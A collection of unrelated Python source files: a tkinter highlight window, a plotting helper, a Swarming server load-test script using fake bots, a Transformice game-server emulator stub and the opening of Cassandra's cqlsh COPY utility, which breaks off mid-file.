return os.path.basename(proc_name.value.decode("utf-8"))
## Helper class for highlighting
class highlightWindow(tk.Toplevel):
def __init__(self, root, rect, frame_color, screen_cap):
""" Accepts rect as (x,y,w,h) """
self.root = root
tk.Toplevel.__init__(self, self.root, bg="red", bd=0)
## Set toplevel geometry, remove borders, and push to the front
self.geometry("{2}x{3}+{0}+{1}".format(*rect))
self.overrideredirect(1)
self.attributes("-topmost", True)
## Create canvas and fill it with the provided image. Then draw rectangle outline
self.canvas = tk.Canvas(
self,
width=rect[2],
height=rect[3],
bd=0,
bg="blue",
highlightthickness=0)
self.tk_image = ImageTk.PhotoImage(Image.fromarray(screen_cap[..., [2, 1, 0]]))
self.canvas.create_image(0, 0, image=self.tk_image, anchor=tk.NW)
self.canvas.create_rectangle(
2,
2,
rect[2]-2,
rect[3]-2,
outline=frame_color,
width=4)
self.canvas.pack(fill=tk.BOTH, expand=tk.YES)
## Lift to front if necessary and refresh.
self.lift()
self.update()
def do_until_timeout(self, seconds=None):
if seconds is not None:
self.root.after(seconds*1000, self.root.destroy)
self.root.mainloop()
def close(self):
self.root.destroy()
|
graphs.py
|
import os
import sys
import time
import json
from typing import Callable, Any, Tuple, List, Mapping
# PACKAGE
from private.graphs import graphers
from private.logs import logDecorator
from private.helpers import pandasHelper, pathsHelper, keysHelper, kwargsHelper, filesHelper
MODULE_NAME = "graphs"
genericLog = logDecorator.genericLog(MODULE_NAME)
@genericLog
def _getGraphDirPathFromType(graphType: str):
GRAPHS_2D_DIR_PATH = pathsHelper.getGraphs2DDirPath()
GRAPHS_3D_DIR_PATH = pathsHelper.getGraphs3DDirPath()
graphTypeToDirPath = {
"2D": GRAPHS_2D_DIR_PATH,
"3D": GRAPHS_3D_DIR_PATH
}
graphDirPath = graphTypeToDirPath[graphType]
return graphDirPath
@genericLog
def _getGraphFuncFromTup(grapherTuple: Tuple) -> Callable:
return grapherTuple[0]
@genericLog
def _getGraphTypeFromTup(grapherTuple: Tuple) -> str:
return grapherTuple[1]
@genericLog
def _getGraphNamesFromTup(grapherTuple: Tuple) -> List[str]:
return grapherTuple[2:]
Graph = Any
@genericLog
def _createGraphHTML(grapherTuple: Tuple, graphs: List, dataFileName: str):
graphType = _getGraphTypeFromTup(grapherTuple)
graphTypeDirPath = _getGraphDirPathFromType(graphType)
graphDirPath = os.path.join(graphTypeDirPath, dataFileName)
graphNames = _getGraphNamesFromTup(grapherTuple)
for graph, name in zip(graphs, graphNames):
HTMLPath = os.path.join(graphDirPath, name)
graph.write_html(HTMLPath)
@genericLog
def _createGraphs(grapherTuple: Tuple, graphInputs: Tuple) -> List[Graph]: \
grapherFunc = _getGraphFuncFromTup(grapherTuple)
graphs = grapherFunc(*graphInputs)
return graphs
@genericLog
def _handleGraphCreation(grapherTuples: List[Tuple], graphInputs: Tuple, dataFileName: str):
for grapherTuple in grapherTuples:
graphs = _createGraphs(grapherTuple, graphInputs)
_createGraphHTML(grapherTuple, graphs, dataFileName)
GRAPHERS_DICT = graphers.GRAPHERS_DICT
@genericLog
def _getAllGraphers() -> GRAPHERS_DICT:
allGraphers = graphers.getAllGraphers()
return allGraphers
PandasDataFrame = Any
@genericLog
def _getXAxisFromPandasDataFrame(dataFrame: PandasDataFrame) -> List[int]:
indicesPair = _getIndicesFromPandasDataFrame(dataFrame)
startIndex, endIndex = indicesPair
xAxis = list(range(startIndex, endIndex))
return xAxis
@genericLog
def _getIndicesFromPandasDataFrame(dataFrame: PandasDataFrame) -> Tuple[int, int]:
indicesPair = pandasHelper.getIndicesPairFromPandasDataFrame(dataFrame)
return indicesPair
@genericLog
def _genericGetCSVFilePandasDataFrame(pathKey: str, graphKwargs: dict) -> PandasDataFrame:
CSVFilePath = graphKwargs[pathKey]
dataFrame = pandasHelper.getPandasDataFrameFromCSVPath(CSVFilePath)
return dataFrame
@genericLog
def _getPreCalcFilePandasDataFrame(graphKwargs: dict) -> PandasDataFrame:
PRECALC_KEY = keysHelper.getPreCalcKey()
dataFrame = _genericGetCSVFilePandasDataFrame(PRECALC_KEY, graphKwargs)
return dataFrame
@genericLog
def _getDataFilePandasDataFrame(graphKwargs: dict) -> PandasDataFrame:
CSV_PATH_KEY = keysHelper.getCSVPathKey()
dataFrame = _genericGetCSVFilePandasDataFrame(CSV_PATH_KEY, graphKwargs)
return dataFrame
GRAPHER_KWARG = str
GRAPHER_INPUTS = List[Any]
@genericLog
def _getGrapherKwargToInputs(graphKwargs: dict) -> Mapping[GRAPHER_KWARG, GRAPHER_INPUTS]:
DATA_AXIS_INDICES_KWARG = kwargsHelper.getGrapherDataAxisIndicesKwarg()
PRECALC_AXIS_INDICES_KWARG = kwargsHelper.getGrapherPreCalcAxisIndicesKwarg()
DATA_FILE_KWARG = kwargsHelper.getGrapherDataFileKwarg()
PRECALC_FILE_KWARG = kwargsHelper.getGrapherPrecalcFileKwarg()
dataFilePandasDataFrame = _getDataFilePandasDataFrame(graphKwargs)
# !preCalcFile below done in a hurry, can isolate to helpers with other paths too
preCalcFile = graphKwargs[keysHelper.getPreCalcKey()]
preCalcFilePandasDataFrame = _getPreCalcFilePandasDataFrame(graphKwargs)
indicesPair = _getIndicesFromPandasDataFrame(dataFilePandasDataFrame)
xAxis = _getXAxisFromPandasDataFrame(dataFilePandasDataFrame)
grapherKwargToInputs = {
DATA_AXIS_INDICES_KWARG : [dataFilePandasDataFrame, xAxis, indicesPair],
PRECALC_AXIS_INDICES_KWARG : [preCalcFilePandasDataFrame, xAxis, indicesPair],
DATA_FILE_KWARG : [dataFilePandasDataFrame],
PRECALC_FILE_KWARG : [preCalcFile]
}
return grapherKwargToInputs
@genericLog
def _getCSVFileName(graphKwargs: dict) -> str:
CSV_FILE_NAME_KEY = keysHelper.getCSVNameKey()
CSVFileName = graphKwargs[CSV_FILE_NAME_KEY]
return CSVFileName
@genericLog
def _createGrapherProcesses(graphKwargs: dict, grapherKwargToInputs: dict) -> List:
CSVFileName = _getCSVFileName(graphKwargs)
all_processes = []
allGraphers = _getAllGraphers()
for grapherKwarg in allGraphers:
grapherTuples = allGraphers[grapherKwarg]
grapherInputs = grapherKwargToInputs[grapherKwarg]
process = Process(target=_handleGraphCreation, args=(grapherTuples, grapherInputs, CSVFileName))
all_processes.append(process)
return all_processes
@genericLog
def _generateAllGraphs(graphKwargs: dict):
grapherKwargToInputs = _getGrapherKwargToInputs(graphKwargs)
# grapherProcesses = _createGrapherProcesses(graphKwargs, grapherKwargToInputs)
# for process in grapherProcesses:
# process.start()
# for process in grapherProcesses:
# process.join()
CSVFileName = _getCSVFileName(graphKwargs)
all_processes = []
allGraphers = _getAllGraphers()
for grapherKwarg in allGraphers:
grapherTuples = allGraphers[grapherKwarg]
grapherInputs = grapherKwargToInputs[grapherKwarg]
_handleGraphCreation(grapherTuples, grapherInputs, CSVFileName)
@genericLog
def _getFileGraphDirsFromFileName(dataFileName: str) -> List[str]:
allGraphDirs = pathsHelper.getAllGraphsDirPaths()
fileGraphDirs = []
for graphDir in allGraphDirs:
fileGraphDir = os.path.join(graphDir, dataFileName)
fileGraphDirs.append(fileGraphDir)
return fileGraphDirs
@genericLog
def _getFileGraphDirsFromKwargs(graphKwargs: dict) -> List[str]:
CSVFileName = _getCSVFileName(graphKwargs)
fileGraphDirs = _getFileGraphDirsFromFileName(CSVFileName)
return fileGraphDirs
@genericLog
def _createGraphDirs(graphKwargs: dict):
fileGraphDirs = _getFileGraphDirsFromKwargs(graphKwargs)
for fileGraphDir in fileGraphDirs:
filesHelper.createDirIfNotExist(fileGraphDir)
@genericLog
def _getFoundHTMLFiles(fileGraphDir: str) -> dict:
foundHTMLFiles = {}
foundFiles = os.scandir(fileGraphDir)
for foundFile in foundFiles:
foundFileName = foundFile.name
foundFilePath = os.path.join(fileGraphDir, foundFileName)
foundHTMLFiles[foundFileName] = foundFilePath
return foundHTMLFiles
@genericLog
def _getGraphKeyToDirPathMapping() -> dict:
graphKeyToDirPathMapping = {}
GRAPH_2D_KEY = keysHelper.getGraph2DKey()
GRAPHS_2D_DIR_PATH = pathsHelper.getGraphs2DDirPath()
GRAPH_3D_KEY = keysHelper.getGraph3DKey()
GRAPHS_3D_DIR_PATH = pathsHelper.getGraphs3DDirPath()
graphKeyToDirPathMapping[GRAPH_2D_KEY] = GRAPHS_2D_DIR_PATH
graphKeyToDirPathMapping[GRAPH_3D_KEY] = GRAPHS_3D_DIR_PATH
return graphKeyToDirPathMapping
@genericLog
def _addGeneratedGraphs(graphKwargs: dict):
graphKwargsCopy = graphKwargs.copy()
graphKeyToDirPathMapping = _getGraphKeyToDirPathMapping()
CSV_FILE_NAME_KEY = keysHelper.getCSVNameKey()
CSVFileName = graphKwargs[CSV_FILE_NAME_KEY]
for graphKey in graphKeyToDirPathMapping:
graphDirPath = graphKeyToDirPathMapping[graphKey]
fileGraphDirPath = os.path.join(graphDirPath, CSVFileName)
HTMLFilesAtDir = _getFoundHTMLFiles(fileGraphDirPath)
graphKwargsCopy[graphKey] = HTMLFilesAtDir
return graphKwargsCopy
@genericLog
def handleGenerateAllGraphs(graphKwargs: dict):
_createGraphDirs(graphKwargs)
_generateAllGraphs(graphKwargs)
graphKwargs = _addGeneratedGraphs(graphKwargs)
return graphKwargs
|
swarming_load_test_bot.py
|
#!/usr/bin/env python
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Triggers a ton of fake jobs to test its handling under high load.
Generates an histogram with the latencies to process the tasks and number of
retries.
"""
import hashlib
import json
import logging
import optparse
import os
import Queue
import socket
import StringIO
import sys
import threading
import time
import zipfile
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(
__file__.decode(sys.getfilesystemencoding()))))
sys.path.insert(0, ROOT_DIR)
from third_party import colorama
import swarming
from utils import graph
from utils import net
from utils import threading_utils
# Line too long (NN/80)
# pylint: disable=C0301
OS_NAME = 'Comodore64'
TASK_OUTPUT = 'This task ran with great success'
def print_results(results, columns, buckets):
delays = [i for i in results if isinstance(i, float)]
failures = [i for i in results if not isinstance(i, float)]
print('%sDELAYS%s:' % (colorama.Fore.RED, colorama.Fore.RESET))
graph.print_histogram(
graph.generate_histogram(delays, buckets), columns, ' %.3f')
print('')
print('Total items : %d' % len(results))
average = 0
if delays:
average = sum(delays)/ len(delays)
print('Average delay: %s' % graph.to_units(average))
print('')
if failures:
print('%sEVENTS%s:' % (colorama.Fore.RED, colorama.Fore.RESET))
values = {}
for f in failures:
values.setdefault(f, 0)
values[f] += 1
graph.print_histogram(values, columns, ' %s')
print('')
def generate_version(source):
"""Generates the sha-1 based on the content of this zip.
Copied from:
https://code.google.com/p/swarming/source/browse/services/swarming/swarm_bot/zipped_archive.py
"""
result = hashlib.sha1()
with zipfile.ZipFile(source, 'r') as z:
for item in sorted(z.namelist()):
with z.open(item) as f:
result.update(item)
result.update('\x00')
result.update(f.read())
result.update('\x00')
return result.hexdigest()
def calculate_version(url):
"""Retrieves the swarm_bot code and returns the SHA-1 for it."""
# Cannot use url_open() since zipfile requires .seek().
return generate_version(StringIO.StringIO(net.url_read(url)))
def get_hostname():
return socket.getfqdn().lower().split('.', 1)[0]
class FakeSwarmBot(object):
"""This is a Fake swarm_bot implementation simulating it is running
Comodore64.
It polls for job, acts as if it was processing them and return the fake
result.
"""
def __init__(
self, swarming_url, dimensions, swarm_bot_version_hash, hostname, index,
progress, duration, events, kill_event):
self._lock = threading.Lock()
self._swarming = swarming_url
self._index = index
self._progress = progress
self._duration = duration
self._events = events
self._kill_event = kill_event
self._bot_id = '%s-%d' % (hostname, index)
self._attributes = {
'dimensions': dimensions,
'id': self._bot_id,
# TODO(maruel): Use os_utilities.py.
'ip': '127.0.0.1',
'try_count': 0,
'version': swarm_bot_version_hash,
}
self._thread = threading.Thread(target=self._run, name='bot%d' % index)
self._thread.daemon = True
self._thread.start()
def join(self):
self._thread.join()
def is_alive(self):
return self._thread.is_alive()
def _run(self):
"""Polls the server and fake execution."""
try:
self._progress.update_item('%d alive' % self._index, bots=1)
while True:
if self._kill_event.is_set():
return
data = {'attributes': json.dumps(self._attributes)}
request = net.url_read(self._swarming + '/poll_for_test', data=data)
if request is None:
self._events.put('poll_for_test_empty')
continue
start = time.time()
try:
manifest = json.loads(request)
except ValueError:
self._progress.update_item('Failed to poll')
self._events.put('poll_for_test_invalid')
continue
commands = [c['function'] for c in manifest.get('commands', [])]
if not commands:
# Nothing to run.
self._events.put('sleep')
time.sleep(manifest['come_back'])
continue
if commands == ['UpdateSlave']:
# Calculate the proper SHA-1 and loop again.
# This could happen if the Swarming server is upgraded while this
# script runs.
self._attributes['version'] = calculate_version(
manifest['commands'][0]['args'])
self._events.put('update_slave')
continue
if commands != ['RunManifest']:
self._progress.update_item(
'Unexpected RPC call %s\n%s' % (commands, manifest))
self._events.put('unknown_rpc')
break
store_cmd = manifest['commands'][0]
if not isinstance(store_cmd['args'], unicode):
self._progress.update_item('Unexpected RPC manifest\n%s' % manifest)
self._events.put('unknown_args')
break
result_url = manifest['result_url']
test_run = json.loads(store_cmd['args'])
if result_url != test_run['result_url']:
self._progress.update_item(
'Unexpected result url: %s != %s' %
(result_url, test_run['result_url']))
self._events.put('invalid_result_url')
break
ping_url = test_run['ping_url']
ping_delay = test_run['ping_delay']
self._progress.update_item('%d processing' % self._index, processing=1)
# Fake activity and send pings as requested.
while True:
remaining = max(0, (start + self._duration) - time.time())
if remaining > ping_delay:
# Include empty data to ensure the request is a POST request.
result = net.url_read(ping_url, data={})
assert result == 'Success.', result
remaining = max(0, (start + self._duration) - time.time())
if not remaining:
break
time.sleep(remaining)
# In the old API, r=<task_id>&id=<bot_id> is passed as the url.
data = {
'o': TASK_OUTPUT,
'x': '0',
}
result = net.url_read(manifest['result_url'], data=data)
self._progress.update_item(
'%d processed' % self._index, processing=-1, processed=1)
if not result:
self._events.put('result_url_fail')
else:
assert result == 'Successfully update the runner results.', result
self._events.put(time.time() - start)
finally:
try:
# Unregister itself. Otherwise the server will have tons of fake slaves
# that the admin will have to remove manually.
response = net.url_read(
self._swarming + '/delete_machine_stats',
data=[('r', self._bot_id)])
if response is None:
self._events.put('failed_unregister')
finally:
self._progress.update_item('%d quit' % self._index, bots=-1)
def main():
colorama.init()
parser = optparse.OptionParser(description=sys.modules[__name__].__doc__)
parser.add_option(
'-S', '--swarming',
metavar='URL', default='',
help='Swarming server to use')
parser.add_option(
'--suffix', metavar='NAME', default='', help='Bot suffix name to use')
swarming.add_filter_options(parser)
# Use improbable values to reduce the chance of interferring with real slaves.
parser.set_defaults(
dimensions=[
('cpu', ['arm36']),
('hostname', socket.getfqdn()),
('os', OS_NAME),
])
group = optparse.OptionGroup(parser, 'Load generated')
group.add_option(
'--slaves', type='int', default=300, metavar='N',
help='Number of swarm bot slaves, default: %default')
group.add_option(
'-c', '--consume', type='float', default=60., metavar='N',
help='Duration (s) for consuming a request, default: %default')
parser.add_option_group(group)
group = optparse.OptionGroup(parser, 'Display options')
group.add_option(
'--columns', type='int', default=graph.get_console_width(), metavar='N',
help='For histogram display, default:%default')
group.add_option(
'--buckets', type='int', default=20, metavar='N',
help='Number of buckets for histogram display, default:%default')
parser.add_option_group(group)
parser.add_option(
'--dump', metavar='FOO.JSON', help='Dumps to json file')
parser.add_option(
'-v', '--verbose', action='store_true', help='Enables logging')
options, args = parser.parse_args()
logging.basicConfig(level=logging.INFO if options.verbose else logging.FATAL)
if args:
parser.error('Unsupported args: %s' % args)
options.swarming = options.swarming.rstrip('/')
if not options.swarming:
parser.error('--swarming is required.')
if options.consume <= 0:
parser.error('Needs --consume > 0. 0.01 is a valid value.')
swarming.process_filter_options(parser, options)
print(
'Running %d slaves, each task lasting %.1fs' % (
options.slaves, options.consume))
print('Ctrl-C to exit.')
print('[processing/processed/bots]')
columns = [('processing', 0), ('processed', 0), ('bots', 0)]
progress = threading_utils.Progress(columns)
events = Queue.Queue()
start = time.time()
kill_event = threading.Event()
swarm_bot_version_hash = calculate_version(options.swarming + '/bot_code')
hostname = get_hostname()
if options.suffix:
hostname += '-' + options.suffix
slaves = [
FakeSwarmBot(
options.swarming, options.dimensions, swarm_bot_version_hash, hostname, i,
progress, options.consume, events, kill_event)
for i in range(options.slaves)
]
try:
# Wait for all the slaves to come alive.
while not all(s.is_alive() for s in slaves):
time.sleep(0.01)
progress.update_item('Ready to run')
while slaves:
progress.print_update()
time.sleep(0.01)
# The slaves could be told to die.
slaves = [s for s in slaves if s.is_alive()]
except KeyboardInterrupt:
kill_event.set()
progress.update_item('Waiting for slaves to quit.', raw=True)
progress.update_item('')
while slaves:
progress.print_update()
slaves = [s for s in slaves if s.is_alive()]
# At this point, progress is not used anymore.
print('')
print('Ran for %.1fs.' % (time.time() - start))
print('')
results = list(events.queue)
print_results(results, options.columns, options.buckets)
if options.dump:
with open(options.dump, 'w') as f:
json.dump(results, f, separators=(',',':'))
return 0
if __name__ == '__main__':
sys.exit(main())
|
transformice.py
|
import time
from utils import logging
from server.tcp.TCPSocket import *
from server.json.JSONServer import *
from server.managers.TCPClientManager import *
from server.managers.JSONManager import *
__author__ = "b3ckerdev"
__license__ = "MIT License"
class Transformice:
__sockets__ = {}
@staticmethod
def run():
logging.info("Transformice emulator (v1.{0} version by {1})".format(
Transformice.version(),
__author__
)
)
running_ports = []
for port_number in [11801, 12801, 13801, 14801]:
Transformice.__sockets__[port_number] = TCPSocket("0.0.0.0", port_number)
Transformice.__sockets__[port_number].bind()
Transformice.__sockets__[port_number].listen(500000)
running_ports.append(port_number)
logging.debug("The following ports was opened for the server: {}".format(
running_ports
)
)
for sock in Transformice.__sockets__.values():
sock.start()
logging.info("All sockets were opened on dedicated threads.")
json_server = JSONServer("0.0.0.0", 8010)
json_server.bind()
json_server.listen(500000)
json_server.start()
thread = threading.Thread(target=TCPClientManager.check_all_clients_has_connected, args=())
thread.start()
thread = threading.Thread(target=JSONManager.check_all_clients_has_connected, args=())
thread.start()
print("\n")
@staticmethod
def version():
return 584
@staticmethod
def key():
return "dlIsYVC"
@staticmethod
def time():
return time.time()
if __name__ == "__main__":
Transformice.run()
|
copyutil.py
|
# cython: profile=True
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ConfigParser
import csv
import datetime
import json
import glob
import multiprocessing as mp
import os
import platform
import random
import re
import struct
import sys
import threading
import time
import traceback
from bisect import bisect_right
from calendar import timegm
from collections import defaultdict, namedtuple
from decimal import Decimal
from Queue import Queue
from random import randint
from StringIO import StringIO
from select import select
from uuid import UUID
from util import profile_on, profile_off
from cassandra.cluster import Cluster, DefaultConnection
from cassandra.cqltypes import ReversedType, UserType
from cassandra.metadata import protect_name, protect_names, protect_value
from cassandra.policies import RetryPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy, FallthroughRetryPolicy
from cassandra.query import BatchStatement, BatchType, SimpleStatement, tuple_factory
from cassandra.util import Date, Time
from cql3handling import CqlRuleSet
from displaying import NO_COLOR_MAP
from formatting import format_value_default, CqlType, DateTimeFormat, EMPTY, get_formatter
from sslhandling import ssl_settings
PROFILE_ON = False
STRACE_ON = False
DEBUG = False # This may be set to True when initializing the task
IS_LINUX = platform.system() == 'Linux'
IS_WINDOWS = platform.system() == 'Windows'
CopyOptions = namedtuple('CopyOptions', 'copy dialect unrecognized')
def safe_normpath(fname):
"""
:return the normalized path but only if there is a filename, we don't want to convert
an empty string (which means no file name) to a dot. Also expand any user variables such as ~ to the full path
"""
return os.path.normpath(os.path.expanduser(fname)) if fname else fname
def printdebugmsg(msg):
if DEBUG:
printmsg(msg)
def printmsg(msg, eol='\n', encoding='utf8'):
sys.stdout.write(msg.encode(encoding))
sys.stdout.write(eol)
sys.stdout.flush()
class OneWayPipe(object):
"""
A one way pipe protected by two process level locks, one for reading and one for writing.
"""
def __init__(self):
self.reader, self.writer = mp.Pipe(duplex=False)
self.rlock = mp.Lock()
self.wlock = mp.Lock()
def send(self, obj):
with self.wlock:
self.writer.send(obj)
def recv(self):
with self.rlock:
return self.reader.recv()
def close(self):
self.reader.close()
self.writer.close()
class ReceivingChannel(object):
"""
A one way channel that wraps a pipe to receive messages.
"""
def __init__(self, pipe):
self.pipe = pipe
def recv(self):
return self.pipe.recv()
def close(self):
self.pipe.close()
class SendingChannel(object):
"""
A one way channel that wraps a pipe and provides a feeding thread to send messages asynchronously.
"""
def __init__(self, pipe):
self.pipe = pipe
self.pending_messages = Queue()
def feed():
while True:
try:
msg = self.pending_messages.get()
self.pipe.send(msg)
except Exception, e:
printmsg('%s: %s' % (e.__class__.__name__, e.message))
feeding_thread = threading.Thread(target=feed)
feeding_thread.setDaemon(True)
feeding_thread.start()
def send(self, obj):
self.pending_messages.put(obj)
def num_pending(self):
return self.pending_messages.qsize() if self.pending_messages else 0
def close(self):
self.pipe.close()
class SendingChannels(object):
"""
A group of one way channels for sending messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in xrange(num_channels)]
self.channels = [SendingChannel(p) for p in self.pipes]
self.num_channels = num_channels
def close(self):
for ch in self.channels:
try:
ch.close()
except:
pass
class ReceivingChannels(object):
"""
A group of one way channels for receiving messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in xrange(num_channels)]
self.channels = [ReceivingChannel(p) for p in self.pipes]
self._readers = [p.reader for p in self.pipes]
self._rlocks = [p.rlock for p in self.pipes]
self._rlocks_by_readers = dict([(p.reader, p.rlock) for p in self.pipes])
self.num_channels = num_channels
self.recv = self.recv_select if IS_LINUX else self.recv_polling
def recv_select(self, timeout):
"""
Implementation of the recv method for Linux, where select is available. Receive an object from
all pipes that are ready for reading without blocking.
"""
readable, _, _ = select(self._readers, [], [], timeout)
for r in readable:
with self._rlocks_by_readers[r]:
try:
yield r.recv()
except EOFError:
continue
def recv_polling(self, timeout):
"""
Implementation of the recv method for platforms where select() is not available for pipes.
We poll on all of the readers with a very small timeout. We stop when the timeout specified
has been received but we may exceed it since we check all processes during each sweep.
"""
start = time.time()
while True:
for i, r in enumerate(self._readers):
with self._rlocks[i]:
if r.poll(0.000000001):
try:
yield r.recv()
except EOFError:
continue
if time.time() - start > timeout:
break
def close(self):
for ch in self.channels:
try:
ch.close()
except:
pass
class CopyTask(object):
"""
A base class for ImportTask and ExportTask
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, direction):
self.shell = shell
self.ks = ks
self.table = table
self.table_meta = self.shell.get_table_meta(self.ks, self.table)
self.host = shell.conn.get_control_connection_host()
self.fname = safe_normpath(fname)
self.protocol_version = protocol_version
self.config_file = config_file
# if cqlsh is invoked with --debug then set the global debug flag to True
if shell.debug:
global DEBUG
DEBUG = True
# do not display messages when exporting to STDOUT unless --debug is set
self.printmsg = printmsg if self.fname is not None or direction == 'from' or DEBUG \
else lambda _, eol='\n': None
self.options = self.parse_options(opts, direction)
self.num_processes = self.options.copy['numprocesses']
self.encoding = self.options.copy['encoding']
self.printmsg('Using %d child processes' % (self.num_processes,))
if direction == 'from':
self.num_processes += 1 # add the feeder process
self.processes = []
self.inmsg = ReceivingChannels(self.num_processes)
self.outmsg = SendingChannels(self.num_processes)
self.columns = CopyTask.get_columns(shell, ks, table, columns)
self.time_start = time.time()
def maybe_read_config_file(self, opts, direction):
"""
Read optional sections from a configuration file that was specified in the command options or from the default
cqlshrc configuration file if none was specified.
"""
config_file = opts.pop('configfile', '')
if not config_file:
config_file = self.config_file
if not os.path.isfile(config_file):
return opts
configs = ConfigParser.RawConfigParser()
configs.readfp(open(config_file))
ret = dict()
config_sections = list(['copy', 'copy-%s' % (direction,),
'copy:%s.%s' % (self.ks, self.table),
'copy-%s:%s.%s' % (direction, self.ks, self.table)])
for section in config_sections:
if configs.has_section(section):
options = dict(configs.items(section))
self.printmsg("Reading options from %s:[%s]: %s" % (config_file, section, options))
ret.update(options)
# Update this last so the command line options take precedence over the configuration file options
if opts:
self.printmsg("Reading options from the command line: %s" % (opts,))
ret.update(opts)
if self.shell.debug: # this is important for testing, do not remove
self.printmsg("Using options: '%s'" % (ret,))
return ret
@staticmethod
def clean_options(opts):
"""
Convert all option values to valid string literals unless they are path names
"""
return dict([(k, v.decode('string_escape') if k not in ['errfile', 'ratefile'] else v)
for k, v, in opts.iteritems()])
def parse_options(self, opts, direction):
"""
Parse options for import (COPY FROM) and export (COPY TO) operations.
Extract from opts csv and dialect options.
:return: 3 dictionaries: the csv options, the dialect options, any unrecognized options.
"""
shell = self.shell
opts = self.clean_options(self.maybe_read_config_file(opts, direction))
dialect_options = dict()
dialect_options['quotechar'] = opts.pop('quote', '"')
dialect_options['escapechar'] = opts.pop('escape', '\\')
dialect_options['delimiter'] = opts.pop('delimiter', ',')
if dialect_options['quotechar'] == dialect_options['escapechar']:
dialect_options['doublequote'] = True
del dialect_options['escapechar']
else:
dialect_options['doublequote'] = False
copy_options = dict()
copy_options['nullval'] = opts.pop('null', '')
copy_options['header'] = bool(opts.pop('header', '').lower() == 'true')
copy_options['encoding'] = opts.pop('encoding', 'utf8')
copy_options['maxrequests'] = int(opts.pop('maxrequests', 6))
copy_options['pagesize'] = int(opts.pop('pagesize', 1000))
# by default the page timeout is 10 seconds per 1000 entries
# in the page size or 10 seconds if pagesize is smaller
copy_options['pagetimeout'] = int(opts.pop('pagetimeout', max(10, 10 * (copy_options['pagesize'] / 1000))))
copy_options['maxattempts'] = int(opts.pop('maxattempts', 5))
copy_options['dtformats'] = DateTimeFormat(opts.pop('datetimeformat', shell.display_timestamp_format),
shell.display_date_format, shell.display_nanotime_format,
milliseconds_only=True)
copy_options['floatprecision'] = int(opts.pop('floatprecision', '5'))
copy_options['doubleprecision'] = int(opts.pop('doubleprecision', '12'))
copy_options['chunksize'] = int(opts.pop('chunksize', 5000))
copy_options['ingestrate'] = int(opts.pop('ingestrate', 100000))
copy_options['maxbatchsize'] = int(opts.pop('maxbatchsize', 20))
copy_options['minbatchsize'] = int(opts.pop('minbatchsize', 10))
copy_options['reportfrequency'] = float(opts.pop('reportfrequency', 0.25))
copy_options['consistencylevel'] = shell.consistency_level
copy_options['decimalsep'] = opts.pop('decimalsep', '.')
copy_options['thousandssep'] = opts.pop('thousandssep', '')
copy_options['boolstyle'] = [s.strip() for s in opts.pop('boolstyle', 'True, False').split(',')]
copy_options['numprocesses'] = int(opts.pop('numprocesses', self.get_num_processes(16)))
copy_options['begintoken'] = opts.pop('begintoken', '')
copy_options['endtoken'] = opts.pop('endtoken', '')
copy_options['maxrows'] = int(opts.pop('maxrows', '-1'))
copy_options['skiprows'] = int(opts.pop('skiprows', '0'))
copy_options['skipcols'] = opts.pop('skipcols', '')
copy_options['maxparseerrors'] = int(opts.pop('maxparseerrors', '-1'))
copy_options['maxinserterrors'] = int(opts.pop('maxinserterrors', '1000'))
copy_options['errfile'] = safe_normpath(opts.pop('errfile', 'import_%s_%s.err' % (self.ks, self.table,)))
copy_options['ratefile'] = safe_normpath(opts.pop('ratefile', ''))
copy_options['maxoutputsize'] = int(opts.pop('maxoutputsize', '-1'))
copy_options['preparedstatements'] = bool(opts.pop('preparedstatements', 'true').lower() == 'true')
copy_options['ttl'] = int(opts.pop('ttl', -1))
# Hidden properties, they do not appear in the documentation but can be set in config files
# or on the cmd line but w/o completion
copy_options['maxinflightmessages'] = int(opts.pop('maxinflightmessages', '512'))
copy_options['maxbackoffattempts'] = int(opts.pop('maxbackoffattempts', '12'))
copy_options['maxpendingchunks'] = int(opts.pop('maxpendingchunks', '24'))
self.check_options(copy_options)
return CopyOptions(copy=copy_options, dialect=dialect_options, unrecognized=opts)
@staticmethod
def check_options(copy_options):
"""
Check any options that require a sanity check beyond a simple type conversion and if required
raise a value error:
- boolean styles must be exactly 2, they must be different and they cannot be empty
"""
bool_styles = copy_options['boolstyle']
if len(bool_styles) != 2 or bool_styles[0] == bool_styles[1] or not bool_styles[0] or not bool_styles[1]:
raise ValueError("Invalid boolean styles %s" % copy_options['boolstyle'])
@staticmethod
def get_num_processes(cap):
"""
Pick a reasonable number of child processes. We need to leave at
least one core for the parent or feeder process.
"""
return max(1, min(cap, CopyTask.get_num_cores() - 1))
@staticmethod
def get_num_cores():
"""
Return the number of cores if available. If the test environment variable
is set, then return the number carried by this variable. This is to test single-core
machine more easily.
"""
try:
num_cores_for_testing = os.environ.get('CQLSH_COPY_TEST_NUM_CORES', '')
ret = int(num_cores_for_testing) if num_cores_for_testing else mp.cpu_count()
printdebugmsg("Detected %d core(s)" % (ret,))
return ret
except NotImplementedError:
printdebugmsg("Failed to detect number of cores, returning 1")
return 1
@staticmethod
def describe_interval(seconds):
desc = []
for length, unit in ((86400, 'day'), (3600, 'hour'), (60, 'minute')):
num = int(seconds) / length
if num > 0:
desc.append('%d %s' % (num, unit))
if num > 1:
desc[-1] += 's'
seconds %= length
words = '%.03f seconds' % seconds
if len(desc) > 1:
words = ', '.join(desc) + ', and ' + words
elif len(desc) == 1:
words = desc[0] + ' and ' + words
return words
@staticmethod
def get_columns(shell, ks, table, columns):
"""
Return all columns if none were specified or only the columns specified.
Possible enhancement: introduce a regex like syntax (^) to allow users
to specify all columns except a few.
"""
return shell.get_column_names(ks, table) if not columns else columns
def close(self):
self.stop_processes()
self.inmsg.close()
self.outmsg.close()
def num_live_processes(self):
